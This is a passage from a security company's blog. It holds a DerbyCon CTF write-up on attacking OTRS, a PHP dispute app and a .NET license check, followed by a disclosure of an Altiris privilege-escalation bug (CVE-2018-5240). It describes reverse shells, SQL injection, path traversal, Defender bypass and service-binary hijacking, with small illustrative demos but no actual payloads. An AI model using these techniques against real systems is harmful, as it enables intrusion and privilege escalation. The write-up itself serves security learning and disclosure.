It was noted that the more stable host was the DC, and as such we deployed a SOCKS proxy server on the domain controller. The SOCKS proxy allowed us to build a tunnel through the compromised host and funnel all traffic through to the target environment from our own hosts. This allowed us to access a number of resources, including remote desktop (RDP) sessions and internal web sites such as OTRS.

The following screenshot shows the homepage of the OTRS software which was identified using lateral movement techniques from the internal domain controller.

After some additional reconnaissance, it was identified that this software was used as an aid to helpdesk staff for raising tickets internally. Clicking the link shown below led to a login prompt, which was found to have the easily guessable credentials helpdesk/helpdesk.

Once connected to the OTRS software as a standard user, the following ticket information was available.


After looking inside the tickets, the following hint was given:

“Hey Jim I am still working on getting this helpdesk app setup since management insists we actually have to take care of the darn users now.

I know the password I set was Swordfish but I can’t remember what the administrator account name was. Anyway now that this thing is stood up we might as well use it”

Swordfish was both the password for an administrator level account on this software and a flag. We still had to identify the default administrator account name, which some research on the Internet revealed to be root@localhost.


We discovered from conducting research against this software (OTRS 6.0.1) that two publicly disclosed vulnerabilities exist in it. One abuses the package manager by uploading a new package, which is vulnerable to code execution, and the other abuses the PGP keys, which can also achieve code execution.

Only one of the two appeared to work in this environment (CVE-2017-16921), which affected the PGP key configuration. More information on these vulnerabilities can be found here:

The essence of the vulnerability was editing the PGP::Bin setting and its parameters to execute some other binary; in this example we used a simple Python reverse TCP connection.



The payload used was:

Once we had a foothold on the host, we identified it was running as the apache user and privilege escalation was required. The usual escalation techniques were attempted and a SetUID binary that seemed out of place was identified.

Using the foothold, we executed the following commands to extract the hashes:

The -O flag writes the contents of the archive to the screen. However, this didn’t obtain a flag, or at least not until we could crack the root password, which we didn’t manage before the end of the CTF. It did, though, reveal that the user’s password for OTRS was OTRS.
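The effect of that -O flag can be reproduced with Python's tarfile module – the member is streamed out rather than written to disk. The archive contents below are invented for illustration:

```python
import io
import tarfile

# Build a small archive in memory containing a fake shadow file.
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w") as tar:
    data = b"root:$6$examplehash:17800:0:99999:7:::\n"
    info = tarfile.TarInfo(name="etc/shadow")
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data))

# Equivalent of `tar -xf archive etc/shadow -O`: read the member's
# contents directly instead of extracting it to the filesystem.
buf.seek(0)
with tarfile.open(fileobj=buf, mode="r") as tar:
    contents = tar.extractfile("etc/shadow").read()
print(contents.decode())
```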


To obtain a full root shell and access the flag, we could have either guessed the location, tar’d the entire root folder, or replaced the /etc/shadow and /etc/passwd files to create a new UID 0 user. We got root access and used PoshC2 to handle our shells, including on this box, as shown below.

There may have been other flags on this host but we ran out of time to find them.

Web Credit Report Dispute Application

This server hosted a custom credit report dispute application. As a pre-authenticated user we were able to create a dispute, but in order to find more of the functionality, we needed to be able to log in.

Clicking on the “Create a report” link, we were taken to the “Problem Report form”. As this page was pre-authentication and there was an authenticated section to the application, we immediately started thinking this might be some kind of stored XSS or SQLi. We spent a bit of time fuzzing, which ultimately showed this not to be the case.

Okay then, let’s try and log in.

After a bit of fuzzing on the login form, it turned out that you could log in using the username:password combination of Admin:. Interesting; it looked like there was some kind of injection vulnerability in the password field. We decided we’d roll with it for the moment and see if anything more could be done with it later.
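For anyone unfamiliar with why a crafted password can satisfy a login check, here is a minimal sketch. The schema, credentials and query are invented (the application's real query was never visible to us); the point is only that concatenating user input into SQL lets the password field rewrite the predicate:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('Admin', 's3cret')")

def login(username, password):
    # Deliberately vulnerable: user input is concatenated into the query.
    query = ("SELECT COUNT(*) FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    return conn.execute(query).fetchone()[0] > 0

print(login("Admin", "wrong"))        # normal failed login
print(login("Admin", "' OR '1'='1"))  # injected predicate bypasses the check
```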

Once we were authenticated, we got to the /viewreports.php page shown below. It contained all of the reports that had been created. Thanks to fellow CTFers’ prodigious use of Burp Suite Active Scan, there were quite a few reports listed. It was also difficult to understand when one was created – something we later found a solution to.

Clicking on any of the links here took you to the /viewreport.php page again, this time detailing all the information that the relevant user had submitted.

Locating a report that we had just created was a little on the hard side; the actual report created looked like it contained some kind of timestamp. Unfortunately, no ID was returned when you created a report either. The solution is documented a little further down.

The rpt field was found to have a path traversal vulnerability, but by far the most interesting part of the page was the “I have fixed this!” link. Viewing the source of the page and decoding the URL using the Burp shortcut ctrl+shift+u, we could see that the rename.php page took two parameters, old & new, which just happened to take file paths as values.
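To see why unvalidated old/new path parameters are so dangerous, consider this toy model of such a handler (entirely hypothetical – we never saw rename.php's source, and the paths below are invented). Any '..' segments in either parameter walk straight out of the intended directory:

```python
import posixpath

UPLOAD_ROOT = "/var/www/reports"  # hypothetical location for report files

def rename_report(old, new):
    # Model of a rename handler that trusts its parameters:
    # '..' segments in either path escape the reports directory entirely.
    return (posixpath.normpath(posixpath.join(UPLOAD_ROOT, old)),
            posixpath.normpath(posixpath.join(UPLOAD_ROOT, new)))

src, dst = rename_report("../../../tmp/report_1538000000.txt",
                         "../../../var/www/html/shell.php")
print(src)  # escaped the reports directory
print(dst)  # an executable extension inside the web root
```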

Our immediate thought was to inject PHP via the create report page, locate it on the view requests page, move it so it had a PHP extension, navigate to it and BOOM code execution.

If only it was that simple; it was indeed possible to change the file extension to PHP, PHP5 and PHPS; however, all the fields in the Report Creation page were being escaped on output, exactly as can be seen here with the first name field:

Okay, so how was it possible to easily spot the page that had just been created?

Well, no Spicy Weasel write-up is complete without the use of LINQPad, our favourite C# scratchpad tool. For those interested in beginning .NET development, this is an excellent tool to experiment with.

The idea was to write a script that would retrieve the listing on the viewreports.php page, persist the current entries and then, on every subsequent run, check for any new pages. To persist between runs, a static class with static container members was created. LINQPad can use a new process per run of the script, which would destroy our static container, so to ensure that the results persisted between runs the following settings were applied (by right clicking the query and selecting properties).

Who said you can’t parse HTML with a regex? 🙂
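The same diffing trick looks like this in Python (the original was a C# LINQPad script, and the link pattern below is an assumption about the page's markup): regex out the report identifiers, keep a set of everything seen so far, and report only the difference on each run.

```python
import re

SEEN = set()  # persisted between runs in the original LINQPad script

# Assumed link format; the real page markup may differ.
LINK_RE = re.compile(r'viewreport\.php\?rpt=([^"&]+)')

def new_reports(html):
    """Return report identifiers not present on any previous run."""
    current = set(LINK_RE.findall(html))
    fresh = current - SEEN
    SEEN.update(current)
    return sorted(fresh)

page1 = '<a href="viewreport.php?rpt=1538000001">x</a>'
page2 = ('<a href="viewreport.php?rpt=1538000001">x</a>'
         '<a href="viewreport.php?rpt=1538000002">y</a>')
print(new_reports(page1))  # first run: everything is new
print(new_reports(page2))  # second run: only the freshly created report
```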

Checking out the server header, we could see that somewhat unusually for a PHP application, it was hosted on Windows. This suddenly made the rename.php file a lot more interesting.

What if the page can read and write to UNC paths..?

So yes, it turned out UNC paths could be read. The problem, though, was that IIS was running with no network credentials, and modern SMB is designed to make it as difficult as possible for hosts with no credentials to connect.

By deliberately weakening the SMB configuration on a virtual machine, it was possible to successfully have a file read by sending the request in the screenshot above. This allowed the uploading of a PHP file that kicked off a PowerShell PoshC2 one-liner, giving us a shell to go searching for the flags.

Once we identified that vulnerability in the application, we hosted a PHP file which executed PowerShell on the remote host using PoshC2.


Once we had C2 on this host, we discovered it was running as IUSR, a low privilege IIS application user. We attempted various standard privilege escalation checks against the host and concluded it was a Server 2016 box with no patches applied but no trivial escalation vulnerabilities. EternalBlue (MS17-010) could have been an option, but it is normally unstable on Server 2016 and was probably not the intended exploit for this host.

After further enumeration of the host we identified two more flags on the system using the command below:

This yielded:

  • info.php:2:header('Flag: TheBruteForceIsStrongInThisOne');
  • viewreports.php:19:header('Flag: InjectionHeaders');

We also found a file inside the adminscripts folder that had a hint inside suggesting that this was a scheduled task that ran every five minutes. We added an additional line to execute our PowerShell payload:

This allowed us to obtain administrator level privileges on the host with PoshC2, as shown below. We then extracted the hashes of all users and cracked the password for the administrator user, which was a large flag, as well as one from the administrator’s desktop.


It should be noted that all Windows 2016 hosts had Windows Defender enabled, which was blocking malicious PowerShell.

As such we needed to migrate to inject the PoshC2 shellcode, which employs the AMSI bypass released by @mattifestation:

Equihax License Validator (fu3) – Keygen Project

The Equihax licensing server had one objective – download the application and try to reverse engineer the .NET application to create a keygen to submit back to the original site for verification.

We first identified it was a .NET assembly by running the file command on Linux.

We used ILSpy to decompile the binary, but it generated the following error when trying to decompile the validateLicense function.


We then downloaded the latest version of ILSpy, which successfully decompiled the code back to C#.


The first section of the code took the user’s first name and MD5 hashed that value. It then took the first eight characters of that hash and used them in the next part of the code. It also had a static string that was used as part of the key generation (Kc5775cK).
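The core of the algorithm can be sketched in a few lines. The MD5-of-first-name step, the eight-character prefix and the static string come from the decompiled code described above; the final concatenation order and separator of the real key are assumptions for illustration:

```python
import hashlib

STATIC_PART = "Kc5775cK"  # static string embedded in the binary

def generate_license(first_name):
    """Sketch of the keygen: MD5 the first name, keep the first eight
    hex characters, combine with the static string. The exact layout
    of the real license key is an assumption."""
    digest = hashlib.md5(first_name.encode()).hexdigest()
    return "%s-%s" % (digest[:8], STATIC_PART)

print(generate_license("Equihax"))
```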

By using the algorithm in the above code, we could simply recreate the string with our own StringBuilder and print it out using LINQPad. There was also some unnecessary code below this, but we didn’t need that to generate the license. Here’s the code for this project and the generated license key.

The full source code is as follows.

This yielded the flag.


There was a downright evil box that hosted a MUD, courtesy of @Evil_Mog. With the exception of a couple of simple flags, we were unable to gain any traction here. This tweet says it all…


This year’s DerbyCon was as fun as ever, and we really enjoyed participating in the CTF competition. Hopefully you can find some value in us sharing portions of the competition with you.

We’re always grateful for the opportunity to practise our craft and we recognise the sheer effort required to put on an event like DerbyCon, including the annual DerbyCon CTF. Once we’ve rested up, we’ll be looking forward to next year!

CVE-2018-5240: Symantec Management Agent (Altiris) Privilege Escalation

During a recent red team exercise, we discovered a vulnerability within the latest versions of the Symantec Management Agent (Altiris) that allowed us to escalate our privileges.


When the Altiris agent performs an inventory scan, e.g. a software inventory scan, the SYSTEM level service re-applies the permissions on both the NSI and Outbox folders after the scan is completed.

  • C:\Program Files\Altiris\Inventory\Outbox
  • C:\Program Files\Altiris\Inventory\NSI

The permissions applied grant the ‘Everyone’ group full control over both folders, allowing any standard user to create a junction to an alternative folder. The ‘Everyone’ permission is then applied through the junction, with inheritance enforced on every file and folder beneath it.

This allows a low privilege user to elevate their privileges on any endpoint that has Symantec Management Agent v7.6, v8.0 or v8.1 RU7 installed.

Analysis – Discovery

When performing red team engagements, it is common to come across different types of third party endpoint software installed on a host. This type of software is always of interest, as it could be a point of escalation on the host, or potentially across the environment.

One example of endpoint management software we’ve often seen is Altiris by Symantec. This software is an endpoint management framework that allows an organisation to centrally administer their estate to ensure the latest operating system patches are applied, to deliver software, to make configuration changes based on a user’s role or group, and to perform an inventory asset register across the entire estate.

The version tested by Nettitude was 7.6, as shown throughout this release; however, Symantec confirmed on 12 June 2018 that all versions prior to the patched release are affected by the same issue.

We noticed that folders within the Altiris file structure had the ‘Everyone – Full Control’ permission applied. These folders seemed to contain fairly benign content, such as scan configuration files and XML files, from what we believed to be the inventory scan or output from a recent task. These folder and file permissions were found using a simple PowerShell one-liner, which allowed us to perform an ACL review on any Windows host using only the tools available on that host. An example of this one-liner is as follows:

Get-ChildItem C:\ -Recurse -ErrorAction SilentlyContinue | ForEach-Object {try {Get-Acl -Path $_.FullName | Select-Object pschildname,pspath,accesstostring} catch{}}|Export-Csv C:\temp\acl.csv -NoTypeInformation


When reviewing the timestamp on these folders, it appeared there was activity happening once a day within this folder. After doing further research into the folders, we concluded that these files were likely modified after a system or software inventory scan. Now, depending on the relevant organisation’s configuration and appetite for inventory management, this may happen more or less often than once per day.

Here’s where the fun begins. Having ‘Everyone – Full Control’ permissions on a folder can be of great interest, but sometimes you can go down a rabbit hole that leads to nowhere, other than access to the files themselves. Nevertheless, we jumped headfirst down that rabbit hole.

It’s worth noting that once we found this behaviour, we went back to a recent vulnerability disclosure against Cylance (an awesome post by Ryan Hanson) to see if this type of attack would be possible here:

Here are the folder permissions that we identified on the ‘NSI’ folder. The permissions on the ‘Outbox’ folder were the same.

We then attempted to redirect the folder to another location using James Forshaw’s symboliclink-testing-tools to create a mount point to another folder and see if those files were written, which was successful. It was also possible to use the junction tool from Sysinternals. The only problem with the Sysinternals junction tool is that it requires the source folder not to exist, whereas in our case the folder was already there with ‘Everyone’ permissions. An example of this is shown below:

If we had completely deleted this folder, we would not have had the correct permissions to recreate it and the attack would have failed. James Forshaw’s toolkit allows the existing folder to be overwritten rather than starting from scratch, as shown below:

Another option for this type of attack is the built-in Windows mklink command, but this requires elevated privileges, which would not have been possible in this situation (the point is that we’re attempting to gain elevated privileges).

To understand exactly what process was overwriting these permissions, we uploaded Process Monitor from Sysinternals to see what was going on under the hood. As you can see from the output below, all files and folders were having a DACL applied by AeXNSAgent.exe.

Analysis – Weaponisation

So how can we weaponise this? There are multiple ways you could choose to make this vulnerability exploitable, but the path of least resistance was to override the permissions on the entire root Altiris folder (“C:\Program Files\Altiris\Altiris Agent\”) so that we could modify the service binary running under the SYSTEM account, namely AeXNSAgent.exe.

The following screenshots show the permissions applied to the ‘Altiris Agent’ folder and the AeXNSAgent.exe service binary, before modifying the mount point to overwrite the permissions:

We then created a mount point pointing to the ‘Altiris Agent’ folder. It’s worth noting that the source folder must be empty for the redirection to be possible; since we had full permissions over every file, this was trivial to achieve. The mount point was created and verified using James Forshaw’s symboliclink-testing-tools.

We then waited for the next scan to run, which was the following morning, and the next screenshot shows the outcome. As we expected, the ‘Everyone – Full Control’ permission was applied to the root folder and everything under it, including AeXNSAgent.exe.

Once we had full control over AeXNSAgent.exe, we could replace the service binary and reboot the host to obtain SYSTEM level privileges. It is worth noting that privilege escalation vulnerabilities involving symlinks are fairly common, and James Forshaw himself has found well over twenty, as shown here:


This vulnerability affected all versions of the Altiris Management Agent up to v7.6, v8.0 and v8.1 RU7. We strongly recommend you apply all patches immediately.

If you have more ideas about exploiting this or similar vulnerabilities at runtime and/or in other ways, then please share them with the community and let us know your thoughts.

Disclosure Timeline

  • Vendor contacted – 31 May 2018
  • Vendor assigned Tracking ID – 31 May 2018
  • Vendor confirmed 60 day disclosure – 31 May 2018
  • Vendor acknowledged vulnerability in v7.6, 8.0, 8.1 RU7 – 12 June 2018
  • Vendor confirmed fix for all four releases – 16 July 2018
  • CVE issued by participating CNA – 23 July 2018
  • Vendor publicly disclosed – 25 July 2018
  • Nettitude release further information – 12 September 2018